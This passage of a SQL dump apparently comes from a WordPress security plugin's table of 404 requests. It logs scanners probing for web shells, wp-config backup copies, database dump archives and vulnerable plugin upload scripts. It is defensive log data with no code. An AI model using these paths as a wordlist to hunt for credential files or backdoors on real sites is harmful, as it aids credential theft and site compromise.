(0xd0bcafd867762338ec2c3b98a285491c, 1483461683, '/wp-admin/proxy.php'),
(0x57b0496c70a6c864a0bdee2655ebbeba, 1483461708, '/wp-content/utf.php'),
(0x98fdfcdd5cf7415c63dd1d91c2745c6b, 1483461732, '/wp-admin/dir.php'),
(0xc8a13bfd0493aaf82174f1bf3ca9cab4, 1483461755, '/wp-content/dirs.php'),
(0x0c82b3175b38af6b84305b01cc0b3729, 1483461814, '/wp-content/template.php'),
(0x821e606fbdc744779bb03814c1b1f21a, 1483461852, '/wp-includes/object.php'),
(0x9240aeabe2d986ac9599c6a58b03e6e2, 1483461885, '/wp-admin/file.php'),
(0x0cba28051812cd24507fce5c35aee310, 1483462040, '/wp-content/include.php'),
(0xf34a4852dcc9ef01cdec3ab050f8e1a2, 1483462058, '/wp-admin/alias.php'),
(0xbc8c9f1f475c4084e591d59db4c47b5d, 1483462069, '/wp-admin/cache.php'),
(0x9e589da05be2a91468ff114914a706eb, 1483462287, '/wp-content/cache.php'),
(0xe3d344a6828a2867fd1722d56ce74f61, 1483462295, '/wp-includes/test.php'),
(0xf5694f113d155c595505dd31a1cea00f, 1483462319, '/wp-content/page.php'),
(0xe3d25cf4900ee419e5a5d81d90388c52, 1483462470, '/wp-content/ajax.php'),
(0x0569e316e0c1be4b666206f1e4f32f73, 1483462500, '/wp-content/sql.php'),
(0xd19de701d8ff4b02d4f407cb6cec44a0, 1483462542, '/wp-content/user.php'),
(0xa1424ad14ecc13422323ec900b67e977, 1483462554, '/wp-content/css.php'),
(0x6b7f2d32e034e8cc6ae6eab5f96d9636, 1483462559, '/wp-includes/header.php'),
(0x11dff30474ba4c5a5e3e6f8e467b7bc7, 1483462564, '/wp-admin/object.php'),
(0x74ef6ba5c94c117d115385bf726ac655, 1483462763, '/wp-content/general.php'),
(0x2de6e6d13fd5020141856ea9d0d07932, 1483462806, '/wp-content/error.php'),
(0xfb2affc9f88252a601c28a325d8e466d, 1483462830, '/wp-admin/css.php'),
(0xcbb1f3ab185a23525b5130919358224b, 1483462856, '/wp-admin/config.php'),
(0xb233f42f26f897c31bfc9e0e1106d31e, 1483462857, '/wp-admin/start.php'),
(0x09b48d626c0ab186d3b741f60f24dbd6, 1483462870, '/wp-includes/session.php'),
(0x4d18a78955a4e6174029cf5ddb09e905, 1483462902, '/wp-admin/ajax.php'),
(0x259e3b3fad7bbb11f2b8408b826b99e6, 1483462902, '/wp-includes/sql.php'),
(0xe112ecd8e2ea3835590955acbc9c3f52, 1483463048, '/wp-includes/search.php'),
(0x46a38849f647bf03c9f3ef6624a42da3, 1483463096, '/wp-content/proxy.php'),
(0x238c856ea66bb6ec4c127ec943e72bbd, 1483463155, '/wp-admin/article.php'),
(0x604833aa728922a8835aa9de9420f4a6, 1483463365, '/wp-admin/header.php'),
(0xf52e23822af1651bab0ad7972ff6cd2c, 1483463372, '/wp-admin/option.php'),
(0x579341a7c98aa1fcd7a99520a76aaa44, 1483463402, '/wp-includes/admin.php'),
(0x39f6266fc0961980d4c197e1265b6c7b, 1483463430, '/wp-content/menu.php'),
(0x42cdfbf0949184e51a928ee5f7525878, 1483463562, '/wp-admin/defines.php'),
(0xe7d3151427ff433e86bcbc23ab56f597, 1483463669, '/wp-content/code.php'),
(0x23c8bce150d8dc53fe9df5f1af7b308e, 1483463676, '/wp-content/article.php'),
(0x9134e56b629a5e34617c7c6776678b05, 1483463741, '/wp-content/gallery.php'),
(0x8337e42cbe73e586d803a8ebbf97d91a, 1483463786, '/wp-content/inc.php'),
(0xc8629421a67a7a425c9a7f21f159e367, 1483463819, '/wp-content/file.php'),
(0x2cfb92d1611f9f912ba087b8fb0355d1, 1483463865, '/wp-admin/info.php'),
(0x91140158d861cae7b57299e3150645e3, 1483463989, '/wp-includes/code.php'),
(0x90669aa4bfb1bad04f95c6b81dc34377, 1483464029, '/wp-content/config.php'),
(0xa6c90a9729e46d2de192eedcf4f1ad39, 1483464031, '/wp-content/alias.php'),
(0x08fa7a3cbfa65fd1a357fac87f5115ab, 1483464088, '/wp-includes/defines.php'),
(0xea2f2a3db064837012c2a8b6a7ec3b03, 1483464132, '/wp-admin/javascript.php'),
(0xc49206ef2c2ce4a51712791341f9671a, 1483464219, '/wp-admin/utf.php'),
(0x08c0c88b4ec8bfc506b2ae83a2de0474, 1483464221, '/wp-admin/gallery.php'),
(0xae3bc791cdbec1c5140eb48e79236fd6, 1483464230, '/wp-admin/help.php'),
(0x2eb8b6112032c46feb4b80d6478989e5, 1483464239, '/wp-admin/code.php'),
(0x7acc58a5b59e1c3562a91bc2d001012a, 1483464323, '/wp-admin/footer.php'),
(0xdc8dafd5ca7f899b2fc51c3d32951150, 1483464327, '/wp-includes/javascript.php'),
(0xb17443bd5616725e6591e75ddc869463, 1483464355, '/wp-includes/title.php'),
(0x9ac4b296f3613d654fccfe22615aca61, 1483464424, '/wp-content/ini.php'),
(0x15cd6b37bc788b8488ee7275b8d8f5a6, 1483464662, '/wp-admin/diff.php'),
(0x2f76f2d324235ce9b6609b5e50f474b0, 1483464719, '/wp-admin/press.php'),
(0x80aec2c00dee4dee5feb0d8ac680e552, 1483464764, '/wp-content/press.php'),
(0xbc02988e34d73839deadd84554817e3f, 1483464789, '/wp-includes/options.php'),
(0x82b57c41696cdae030a1cdd2cd495516, 1483464806, '/wp-includes/gallery.php'),
(0xcfbcb46d4946c1f4e5dca3a5ac474eb0, 1483464828, '/wp-admin/view.php'),
(0x833b5258f1fbf589a78d3d2289f5a7ce, 1483464850, '/wp-content/blog.php'),
(0x9848495dba63e88c8f7271b948b315c1, 1483464856, '/wp-admin/test.php'),
(0x6e3840c1d67f824df68289b2ca666bc7, 1483464891, '/wp-admin/global.php'),
(0xdd9bc9b08c6d7a8cb8508fb0566b84a2, 1483464932, '/wp-includes/menu.php'),
(0x1c44118db13b812c1c1b3d837b99b706, 1483464980, '/wp-admin/search.php'),
(0x523b64e09aa0fc88a832477e05e03076, 1483465003, '/wp-admin/ini.php'),
(0x5dfa2e53ee2aba490637a9dc902f4643, 1483465016, '/wp-admin/system.php'),
(0x92360c97be9ed3da5dcd98d65455f6b9, 1483465261, '/wp-admin/dirs.php'),
(0x2f298e5d3f0c070c64d94da4e7b27795, 1483465264, '/wp-content/functions.php'),
(0xd6caf8e99f41f0139dc6a3c567a3d85f, 1483465283, '/wp-content/javascript.php'),
(0xebd384dc92ce5e177e87f1372221588d, 1483465405, '/wp-admin/xml.php'),
(0x0f7aa24f2d8cf61bce1b75df6dbd2b1f, 1483465468, '/wp-includes/config.php'),
(0xa308563d6f05bf87665aa7a290561919, 1483465477, '/wp-content/admin.php'),
(0x569a9273a46f018415d93655043c1208, 1483465506, '/wp-content/footer.php'),
(0x968a1b59fd3dca17fc98554066d1e8f6, 1483465532, '/wp-content/lib.php'),
(0xde6b649724240584da00964c73a04c1d, 1483465540, '/wp-admin/general.php'),
(0x14fb8f53d916c7b9cb217265b9297645, 1483465649, '/wp-includes/ini.php'),
(0x7b57ea69aeccc69499a5ebb4892cd1f4, 1483465691, '/wp-includes/files.php'),
(0xe7b0fb78c3536bf48eab7a83940a729a, 1483465742, '/wp-includes/inc.php'),
(0x92d5918e9baf7fa5bc9b5c4cc7695f97, 1483465798, '/wp-includes/alias.php'),
(0x705c7186afdebafe09f6cbfd337601d1, 1483465827, '/wp-content/dump.php'),
(0xc9e62462fcb58b3e176782278fc4c7e6, 1483465878, '/wp-content/db.php'),
(0xe8ac3a7545f4a815887cbc94f40a82d0, 1483465922, '/wp-includes/view.php'),
(0x86c2cbf2532372618c0fa777b53a9948, 1483465964, '/wp-includes/model.php'),
(0x572809a1fb171f019745278364536470, 1483466104, '/wp-includes/article.php'),
(0xa3bad9fc62ddc76617d1be524632b6b2, 1483466111, '/wp-includes/blog.php'),
(0xed9d0967fc844317c4177f4ca098dd22, 1483466123, '/wp-content/system.php'),
(0x30baf08e65699173ef62e3461b5c1536, 1483466186, '/wp-includes/file.php'),
(0x44d8491d654f46fd88d1404fab1bb6c9, 1483466277, '/wp-admin/files.php'),
(0xd0d6ae595b17982e8654176c5d14f189, 1483466408, '/wp-content/test.php'),
(0x7e22df1512406aedc608a77bfe8e29ee, 1483466427, '/wp-admin/error.php'),
(0x55c09d2224cde0bdbd9d2d294b792a52, 1483466436, '/wp-includes/utf.php'),
(0x95476217d518887d0e34ce615d3ded81, 1483466436, '/wp-content/session.php'),
(0x86ae51430c2b39f2ceefbf1c2ba92be2, 1483466561, '/wp-content/start.php'),
(0x0dd4bdecd3bad4a5b4d174ccb8640a86, 1483466610, '/wp-content/object.php'),
(0xe15ed0b48dc352d261981532082534c1, 1483466615, '/wp-admin/template.php'),
(0x59e27a4f2f65c483785e70bffbb4e1e3, 1483466622, '/wp-content/title.php'),
(0x699214a6ed883ab94144b0ac440cd38a, 1483466644, '/wp-includes/include.php'),
(0x02bd91a1bf6beb87f356d6b382c3eae2, 1483466726, '/wp-includes/xml.php'),
(0xc310bbd26dbbd1e3ba29e1d6d1b29f5d, 1483466735, '/wp-includes/footer.php'),
(0xb389716e6c1647f97e3e51e68cce7363, 1483466796, '/wp-includes/general.php'),
(0x0d8accff5825a1309259bd66c70d717d, 1483466861, '/wp-admin/functions.php'),
(0x5ebb9aa3427f47dd0266796acc789057, 1483467051, '/wp-content/header.php'),
(0x5424e3c987971eb91b8b0a7e9c38e4a9, 1483467083, '/wp-admin/session.php'),
(0xe17e231c6b750d43807f9a28c210d8e6, 1483467148, '/wp-includes/dirs.php'),
(0x2cf0611ae44e4dfaf58e8db348dfcf08, 1483467149, '/wp-includes/start.php'),
(0xdeb85f166cda35d90ff1f04dd8452e5c, 1483467197, '/wp-includes/press.php'),
(0x135f2bbe4d3019fd262d311eef6bfcb6, 1483467199, '/wp-content/xml.php'),
(0x5eeeb6f71b0a0c3adcf352ea71cdfe47, 1483467215, '/wp-content/search.php'),
(0xe3cd4c41a2b5c0dba785bda8bbd726a1, 1483467232, '/wp-content/dir.php'),
(0xc96a2e7774fe4a52c8f4b3705198a16b, 1483467427, '/wp-content/model.php'),
(0x81d0811d47e9bc6ff364d6dc4825d7c5, 1483467467, '/wp-admin/lib.php'),
(0xea41104d986476d3997dbc3ac9449a68, 1483467625, '/wp-content/view.php'),
(0xe011cac1858ae3ee9bb8c656dcd68be4, 1483467631, '/wp-content/files.php'),
(0x53230af6e8292f8d494d8859b530eb08, 1483467655, '/wp-includes/system.php'),
(0xc0b08506b99629dfa811e115d98e01ed, 1483467692, '/wp-admin/blog.php'),
(0xaa1b912a6139f0eeb660a2d8308155e7, 1483467695, '/wp-includes/proxy.php'),
(0x54fe91e93e22790ab493f8566972c580, 1483467723, '/wp-admin/title.php'),
(0xdf8f48ec40dfae5e73892c0da501d6c2, 1483467888, '/wp-admin/sql.php'),
(0xb40469b7cb4cf10dc72cae19458d0311, 1483467904, '/wp-admin/inc.php'),
(0xa44be34c43a5c768622b7af5ca873113, 1483467919, '/wp-admin/stats.php'),
(0x981d5b421c41250adecfdb33f34f7a89, 1483468149, '/wp-includes/lib.php'),
(0x36acfcb50626cf24f5db01059b16d8ea, 1483468310, '/wp-includes/stats.php'),
(0x67ca0b0a18d93e92d397c9180f71a212, 1483468337, '/wp-admin/user.php'),
(0xd4a59f7ce96e751e4986cf86478e4aed, 1483468551, '/wp-content/login.php'),
(0xa2902fec6b22d879393c8b6d1aa36d94, 1483468566, '/wp-includes/help.php'),
(0x8ab8eee3b53038df6e49af35db49541d, 1483468590, '/wp-includes/themes.php'),
(0x28c7106185539dddaaac135edf7b3a53, 1483468656, '/wp-content/list.php'),
(0x7ce78d95044895560b1ca17b24fc0284, 1483468667, '/wp-includes/list.php'),
(0x726adec461b1a56647701f2f93917eb5, 1483468725, '/wp-content/defines.php'),
(0xb70f9e26c0ed6a07f6b7e3320f8f0050, 1483468958, '/wp-includes/global.php'),
(0x5f740d42ea65bda06a3db8ffa11e1df8, 1483469037, '/wp-includes/dump.php'),
(0xc7162f8be28f8eeca11f09936ab1bfe5, 1483469052, '/wp-content/themes.php'),
(0x053f497e568aeee9b02e0680d2cfd3fb, 1483469055, '/wp-includes/login.php'),
(0x618489aa2d04185e293d82cf39b2496c, 1483469095, '/wp-admin/db.php'),
(0x6e3af17011f9705218022bf2a8b477b0, 1483469151, '/wp-content/plugin.php'),
(0x7192a83d3784eba178779255df713eff, 1483469165, '/wp-content/option.php'),
(0x695c4267cf6b830cf19f84e786c4387c, 1483469261, '/wp-admin/list.php'),
(0x8da49bbdb830d154918c64a248ca6b2c, 1483469377, '/wp-content/info.php'),
(0x68477ec69e84dffd225fdb27f351ce2c, 1483469377, '/wp-content/options.php'),
(0x8a9306dbd1cbe1a2f6d0202fe7f8e307, 1483469387, '/wp-content/global.php'),
(0x7d20397ba20b933b5983e3310be44984, 1483469586, '/wp-admin/login.php'),
(0x64923fcdced22be3e4ab7e473be37b0a, 1483469615, '/wp-includes/info.php'),
(0x1987eadbb6248c299c275d17389eee13, 1483469669, '/wp-content/stats.php'),
(0xe7a50d8a942d858fcbd6ddc732bc5ac5, 1483469692, '/wp-includes/db.php'),
(0x8e6a2628a7b638820b69cafdcfaef2b8, 1483469793, '/wp-includes/css.php'),
(0x08a49b61480fcdbfb069d3d06cf5f5c8, 1483469990, '/wp-admin/dump.php'),
(0x77da1c866ff193547939dda5e759289e, 1483470317, '/wp-admin/model.php'),
(0xe4cfc9e24411f6adc7520ee3e48ed214, 1483470637, '/wp-includes/error.php'),
(0xc422e759b965a7d69afacda740c35d01, 1483470792, '/wp-content/help.php'),
(0x85d03036aeba2124aa26f3452996e546, 1483470819, '/wp-admin/plugin.php'),
(0x55e5f95ad37d238db4188688f74b094e, 1483470904, '/wp-includes/page.php'),
(0x061e0b25efedfd35edbc71186e575bb2, 1483486122, '/logo_img.php'),
(0x9c26d55680ed9a48a88970083146c4e0, 1483486122, '/wp-admin/css/logo_img.php'),
(0x69c3d22c099fc19e23bb4cd73fa0862f, 1483486132, '/wp-content/languages/logo_img.php'),
(0x868973ffc4e54a64da4fe308aa65cffd, 1483486132, '/wp-admin/user/logo_img.php'),
(0x7ef9865978426ca00497eb102bb6cb4c, 1483486136, '/wp-content/plugins/logo_img.php'),
(0x9d6f35251ea570a87145912016bb531e, 1483486136, '/wp-content/themes/logo_img.php'),
(0x9424c1339787e609448d2b5d2ed93e70, 1483486136, '/wp-includes/css/logo_img.php'),
(0x0edfb14f5ca52d3aa0453d0c05f517e8, 1483486136, '/wp-content/uploads/logo_img.php'),
(0x96a82d6b0f283da11b44eb309eaa356c, 1483486136, '/wp-admin/logo_img.php'),
(0x19113d1f239e5663e7a1b7ce5420b5d6, 1483486136, '/wp-includes/js/logo_img.php'),
(0x1d6e24648a02515377cb3a80e771e37a, 1483486136, '/wp-includes/images/logo_img.php'),
(0xfd6d41d859d84ea5b3fd734ef68be943, 1483486136, '/wp-admin/maint/logo_img.php'),
(0x2c2a8985858271afc8411f32dd02e384, 1483486136, '/wp-content/upgrade/logo_img.php'),
(0x697d97d87f7ab81c58c7c961790265cc, 1483486136, '/wp-admin/network/logo_img.php'),
(0x1963a6c07870ede04474e077881340bb, 1483486136, '/wp-admin/includes/logo_img.php'),
(0xc96377746a4f5ff3243ffc8d73a12303, 1483486136, '/wp-admin/js/logo_img.php'),
(0x57d25c21d605f533eaa22abc18703914, 1483529472, '/CHANGELOG.txt'),
(0xc5f299fdb9415d42fd4ec94998e8ac7e, 1483542110, '/wp-cros.php'),
(0xc5c60b19317aa07cc0fda785c843f235, 1484052605, '/wp-config-backup1.txt'),
(0x4992e60b761edfdb4349314fcc23f23f, 1484052607, '/wp-config%20fix.txt'),
(0xe728c949db9016478a757103253bb63a, 1484052609, '/wp-config.bak'),
(0xbc4e39c809bc9c279c6c970d3e8d57ff, 1484052621, '/wp-config.phpOLD'),
(0xa0d14a0b43e8f6c5d66aa123ea9d1259, 1484052629, '/wp-config.txt'),
(0xd283f1f62f58662c6f53f8e860e88680, 1484052634, '/wp-config.phpa'),
(0xc0b2b4f90dad30704cadd2929485de89, 1484052642, '/wp-config.old'),
(0xe594597e63ad17d35d6e7abb4600e8fb, 1484052646, '/wp-config.php.txt'),
(0x8debb9154d21e0c5084487f7e1f96657, 1484052649, '/config'),
(0x8a44ecdf47b2813403eed5b035d1ebdc, 1484052650, '/wp-config.'),
(0x3430934cf56ad6591685de8ba094bc17, 1484052654, '/wp-config-backup.txt'),
(0x2f143a8e90e4ec9e117a17dce3e5bae0, 1484052656, '/wp-config-backup'),
(0xe3521403c9f9323e79150797b17ae52a, 1484052659, '/config.bak'),
(0xcba9b2530eb5f09e4b8d89251087ef47, 1484052661, '/config.old'),
(0x859c357ecc9426dc2c1aef5a29b903ac, 1484052663, '/config.php~'),
(0xd1202826d31fdc05ba63cc55b1f87a30, 1484052670, '/wp-config.data'),
(0x86aef86b7d5d1a4da5bac68458397e22, 1484052683, '/wp-config.php~~'),
(0x8ccdd58ae44c38a7017ed8ba6ffc00a7, 1484052689, '/config.'),
(0x59b5d0251d24a79573f866b6cf4b1790, 1484052691, '/wp-config.phpold'),
(0x2e3e1d9cd7fd4329c15a98d49caa7156, 1484052696, '/wp-config.phpb'),
(0xdbe182a0d1354a847afce92f5bf0c47c, 1484052726, '/wp-config.php-n'),
(0x77e0225449157ee7ad90ae8a9d4539d4, 1484052727, '/wp-config.phpnew'),
(0x5e24237b4ca74203cf38420f597c6e7c, 1484052736, '/wp-config.cfg'),
(0x1589d2fc7dd7764a6c332b0154b3e424, 1484052740, '/config.php~~'),
(0x44a7bde3c1aa2260b4efd68cd9c822b4, 1484052749, '/wp-config.php~~~'),
(0x071c5faf15c1a43d471e4d27e310fddf, 1484052753, '/wp-config.phptmp'),
(0x4b1723cedb650e843b617fc5fa984ff2, 1484052767, '/wp-config-sample.php~'),
(0x03d44ba7ca24a32e1f74ce6b03613c50, 1484052795, '/wp-config.php_'),
(0x0325498e850564a98873b4522f65f941, 1484052821, '/wp-config.local.php'),
(0xe411ea300f3ef683a917d7e94164796f, 1484052824, '/wp-config.html'),
(0x57d7b7860b9e4b4e2afc88409c749090, 1484052826, '/wp-config.htm'),
(0x630ed78defd13eaee7e04682fb3f2f66, 1484054673, '/wp-includes/pomo/foolcar.php'),
(0x2ab54083794be82a47937fdb0668ff8f, 1484054786, '/wp-content/plugins/foolcar/foolcar.php'),
(0x3f7e44cea2f5ae9ac7f5b029b09e7684, 1484055289, '/backup.php'),
(0x5e34be9e375fce9e475261f17a035e7b, 1484067603, '/wp-content/themes/twentyfourteen/system.php'),
(0xa1bd5b463e78c48a3eca1e1c75241928, 1484067645, '/wp-content/themes/bootcake/'),
(0x16ee3acd054c87d1a5e78f3be7e34d9e, 1484075238, '//yt2.php'),
(0x2744b36a6d4e4fe4ee22953162c90936, 1484075262, '//ytt.php'),
(0xcce1659e66d862ceb054aab0863de15d, 1484107770, '/wp-content/plugins/showbiz/release_log.txt'),
(0xc7177657b9c259b026778cba4601d89a, 1484107773, '/wp-config.php.save'),
(0xf0d25d49d1b99c60842ac88724fb55f9, 1484107774, '/wp-config.php.swp'),
(0xad878a9143062ead8382417634ff3075, 1484107774, '/wp-config.php.swo'),
(0x92d0f070d5bf00f950fa18dd52078e28, 1484107775, '/wp-config.php_bak'),
(0x2c7cc3d848ced1dd3d77d2bde8f722a2, 1484107777, '/wp-config.save'),
(0x8e034820a7c96d5f6bb0c7a28455fd7f, 1484107778, '/wp-config.php.old'),
(0x16c87ecdb6a352688ac844163c1b8b08, 1484107779, '/wp-config.php.orig'),
(0x68c4220fa9107f0fbf46f504bc60761e, 1484107780, '/wp-config.orig'),
(0x4e34d200cca60a17924fc1031e5f6c84, 1484107780, '/wp-config.php.original'),
(0xf186651266e8ff5a947e02f07c9ce744, 1484107781, '/wp-config.original'),
(0xb0a38313342a77b3c505a8045bc2cd91, 1484107782, '/wp-content/plugins/ninja-forms/readme.txt'),
(0x776e44924ab96df2d9f2a17a949c1775, 1484191414, '/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php'),
(0x9b5f3f83560fc59631f7a31c27920081, 1484310385, '/wp-content/plugins/smart-slide-show/js/swfupload/js/upload.php'),
(0x5633d01cdcc75631eeaf250371c13f25, 1484323487, '/wp-content/plugins/unattached/wso2.php'),
(0xe42a8b319a9dbb8d7478a0637c9a40bf, 1484323489, '/wp-content/plugins/unattached/wso2.php.suspected'),
(0xa9389732262593c5ebeb9f5c7c8f7fb9, 1484323490, '/wp-content/plugins/unattached/wso.php'),
(0x3f11758ae098c3d352f15629b5dacd5d, 1484365786, '/wp-content/plugins/libravatar-replace/config_all.php'),
(0x1d9dc3e476806fd8b5f8e2b00e3b13f3, 1484371757, '/images/logo_img.php'),
(0x16478c88232e7e22f3e77bac049d437b, 1484372663, '/wp-content/plugins/libravatar-replace/libravatar-replace.php'),
(0x0248f74272f4fabbd53fcc3749d97d2f, 1484460983, '/wp-content/plugins/wp-3dbanner-rotator/js/swfupload/js/upload.php'),
(0xd05f74ba70d2b5bfc7bc2bdf999f51ec, 1484610298, '/wp-content/common_1.php'),
(0x95639447dcdfaaba50327e56f4435b79, 1484673021, '/wraper.php'),
(0xbf81a7a2afd7c4eb11bd21adea8dace1, 1484673085, '/notlce.php'),
(0x897538d8e2f5e01a4fdd98821907e188, 1484673358, '/book.php'),
(0xbf2de025db2598a380d092486fd60c9f, 1484673954, '/shwrk.php'),
(0x92e3caed7008565470d50241cf165056, 1484673996, '/lndex.php'),
(0x61270537272bc52a8dee062eb249efa6, 1484674261, '/api.php'),
(0x636e872196b3a6efba2741637d07e07f, 1484738970, '/wp-content/plugins/html5avmanager/license.txt'),
(0x7f689d7c2d1d5a4d23b0343821c1bc65, 1484944347, '/blog/wp-content/themes/sketch/404.php'),
(0xd5ee374891406c4779d5124e533c0019, 1484944348, '/wordpress/wp-content/themes/sketch/404.php'),
(0x59daef887d40726300a8659b94112a47, 1484944349, '/wp/wp-content/themes/sketch/404.php'),
(0x8e13add0808b98d78bccb2b32ff4ef1b, 1484944550, '/shell.php.suspected'),
(0x7cdf8ec2468ac28c00a6da5a297452dc, 1484944569, '/tmp.php.suspected'),
(0xeced8c4b8c195770b00a150ba4721447, 1484944572, '/bubus.php'),
(0x62fb3db133cdfe46c4930f6f3a509cf8, 1484944574, '/bubus.php.suspected'),
(0x989245aeb82def6250b72f263eb08422, 1484944579, '/wso.php'),
(0x26a13536fb45ee3719082f8ad8687106, 1484944586, '/wso.php.suspected'),
(0x03ad8625d4b834c1a5a0d36774f5d99a, 1484944610, '/wso2.php'),
(0x56d307429da9a9a40d30aa87c55570b4, 1484944632, '/wso2.php.suspected'),
(0x3facfdf002c0718c9ac14de951a5804e, 1484944635, '/c99.php'),
(0x8fc1700486a0564ccca535228d2f2e81, 1484944638, '/c99.php.suspected');
INSERT INTO `wp_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x2448ff1dc8b49d7d02f02fb47e119650, 1484944643, '/login.php.suspected'),
(0x7755d0903df12b5443f129ec2764bbf8, 1484944646, '/.images.jpg/login.php'),
(0x02b78ab2b4528f2a2d0b47cbecb9166e, 1484944657, '/.images.jpg/login.php.suspected'),
(0x9875eefb54875a1377ff50efa5957457, 1484944661, '/1111.php'),
(0x4f3ab84ab34885179cb934434452d38c, 1484944664, '/1111.php.suspected'),
(0x52f9383cbc1b221c2a017ffaf161b5ab, 1484944666, '/1.php'),
(0xe8eb25b02c479af48aa73c46b8f324be, 1484944670, '/1.php.suspected'),
(0x485dbc8a0688787924d099435d52eaa7, 1484944674, '/mko.php'),
(0x52a9e08d81966e1fb552c159067480f6, 1484944684, '/mko.php.suspected'),
(0x3d94116d7d31856da09ed742aae47c78, 1484966303, '/wp-content/plugins/mm-forms/includes/doajaxfileupload.php'),
(0x453c176d3ce2820331a6fd276f17a1ea, 1484966428, '/db_backup.sql.7z'),
(0x38a2891979110b07ce2a884a1c3bfbc1, 1484966585, '/dump.7z'),
(0xd40866bc297cd3d4c983d1a04445dafb, 1484966616, '/backup.sql.gz'),
(0x31c0b5a4ed241f50cf82f1bbca2e65c3, 1484966900, '/site.sql.tar.bzip2'),
(0x6c135ead20db12b84546725d9c88af01, 1484966943, '/www.sql.7z'),
(0x03ed6df97ef28b9992ee998f3d4caac4, 1484966975, '/db_backup.7z'),
(0x2f8a7ace0175477cf46e7c22c7942748, 1484966986, '/db_backup.tgz'),
(0x31f1d7289c06de76cb541228c9d24f97, 1484967069, '/upload.sql.tar.gzip'),
(0xb381e5afa22d92a1e2d8dde998549faa, 1484967202, '/1.sql.tar.bzip2'),
(0x1d5ca0e2f5860d482cc3c334b6b38048, 1484967206, '/upload.sql.rar'),
(0xd3fc33c8a46cae86205957e2b2514074, 1484967207, '/home.sql.tar.gzip'),
(0x7248a6c59dab09a20e88bd20f9886743, 1484967408, '/dump.sql.tgz'),
(0x9f73f76ceea10d02399751afc805bc23, 1484967453, '/site.sql.gz'),
(0x13440b63bac365a36d40f701ce2facdf, 1484967485, '/data.sql.gz'),
(0xaf85bdce40eaf9d925d6692374dd4df7, 1484967502, '/db_backup.tar.bzip2'),
(0x1acdd6a44ce99713916c8ecb15bfe3df, 1484967536, '/www.sql.gz'),
(0x3d97920c87d20bf19642a3eebc328a73, 1484967586, '/upload.sql.tar.bzip2'),
(0xc877b90ed62c48ab7401f105a3b1a610, 1484967813, '/dump.rar'),
(0x73b531287d2a7208544250b80caa5f1a, 1484967956, '/db_backup.tar.gzip'),
(0x9ab06fa8135f346b49472079b12eb19d, 1484967958, '/db_backup.sql'),
(0xbf360dbad29fc797ee2a612d8825b540, 1484967970, '/db_backup.sql.zip'),
(0xa94ec5f2a3f89308e218bab0e677a508, 1484968092, '/site.sql.tar.gz'),
(0xd7ad248cbecf9fe9e1d7c696a9943f9c, 1484968240, '/sql.rar'),
(0x7cef6ced926d659feeebf18aaf667c22, 1484968242, '/dump.sql.rar'),
(0x3b570330522feea8eb33f9f97c4b558b, 1484968249, '/www.sql.tar.bz2'),
(0xc3cb3388640b1cfc6736ee6d491c4d7d, 1484968394, '/home.sql.tar'),
(0x1b34251d56e8777147c17d30cb78b459, 1484968461, '/home.sql.tgz'),
(0x4c94669899b01810fad2e2d72c29c938, 1484968543, '/mysql.sql.tar'),
(0x6fcd7b1ccf53623c6bd6bcd1b3cce49f, 1484968602, '/db_backup.tar'),
(0xb9719333941e226e9f53561a43751981, 1484968606, '/upload.sql.bz2'),
(0x210d33b3a7697bbb3df352d6328031b0, 1484968630, '/db.sql.tar.gzip'),
(0x8ba4569f715810dde08eb1fc1c8cde2a, 1484968638, '/home.sql.bz2'),
(0xa2c2c7d0534f3fd63b109d638fc26583, 1484968643, '/mysql.bz2'),
(0x9b5d6fffd8d816adfc18be0ead1d92ee, 1484968652, '/dbadmin.bz2'),
(0x3866e3a463fb291a9b0763844dbd832d, 1484968653, '/www.sql'),
(0x9e435b9e5b063a7b29bbc4fa793a3d19, 1484968669, '/dbdump.sql.tar.gzip'),
(0xfea4e56ff3010f10cb37495deeead8d2, 1484968673, '/public_html.sql'),
(0x228e39003b746b141bc9e186bbbc514d, 1484968736, '/dbadmin.tar.bz2'),
(0xc619c1813d52e839fd06e2271e73db86, 1484968761, '/web.sql.gz'),
(0xcea257f9202f150ce3e6bae18c27ed3c, 1484968780, '/dbase.tar.gz'),
(0x2d106964e4b48ed9c627eab00ed1c33e, 1484968820, '/dbase.sql.tar.bz2'),
(0xdfef4f4942a2a7a4f3fd31cfe5683bd2, 1484968824, '/upload.sql.tar.gz'),
(0x403d46561f944bd3328749dc6c774b80, 1484968834, '/db_backup.sql.tar.bz2'),
(0x9f36d360f2712d8a50c74e36e0dac793, 1484968874, '/sql.sql.rar'),
(0x697550b806a8f013ffa74be28be76f3d, 1484968933, '/site.sql.tgz'),
(0x2b33255a624cf7143b201a1f6c983b5a, 1484968957, '/backup.sql.tar'),
(0x1c8751c5afa419ca56b6f95344a82d4f, 1484968975, '/1.sql.tar'),
(0xd3fb766427e95ca4d9a3b76f3bf9d12a, 1484968998, '/dump.sql.tar.bz2'),
(0x69c7b1c50e186c22c19d0c21c614219f, 1484969029, '/dbadmin.zip'),
(0xec7bff355c548354be1cc8bccf9a961c, 1484969052, '/temp.sql.tar.bz2'),
(0xa2be777a58209c5150b0ae82a32e462e, 1484969128, '/www.sql.tar'),
(0x127d97a93053a1de34097cf91565d444, 1484969134, '/mysql.tar'),
(0xec9e430a790484d5c0e909554685b49e, 1484969160, '/upload.sql.gz'),
(0x3eddda4f43ea3c4828fd92b905f38226, 1484969188, '/home.sql.tar.bzip2'),
(0x707ae1358b2437041baabbb3daf4e5aa, 1484969206, '/backup.sql.tar.gz'),
(0x2eafd40e581f302f14d97ff0d342117a, 1484969216, '/mysql.sql.tar.bz2'),
(0x596fcdd45efd0f395b20384130fee2b2, 1484969242, '/dbdump.tar.gzip'),
(0x9669c8b95771059fcc62f9ec6d0a02a7, 1484969258, '/db_backup.sql.bz2'),
(0xba9c0c0a013e1c9aa474d8a302708dbb, 1484969303, '/data.sql.sql'),
(0x047bdaba6ac6087de5126ec44e6cd348, 1484969310, '/dump.tgz'),
(0xdf73764b8215426deaee3a21ac0f178e, 1484969319, '/dbadmin.sql.zip'),
(0xaa89c7eb3f6d3b049775a4a21f14ec53, 1484969331, '/www.sql.tar.gz'),
(0x3866f74b1cc5e6170da398c0f1841893, 1484969354, '/dbase.rar'),
(0x8f6cad8d5850d4624c1dc6a8c22098b1, 1484969362, '/db_backup.rar'),
(0xa3e8478c145cbe263cf94edb89942754, 1484969369, '/home.sql.tar.gz'),
(0xba9ea45821b4e80cf5cefa9839603b46, 1484969371, '/mysql.sql'),
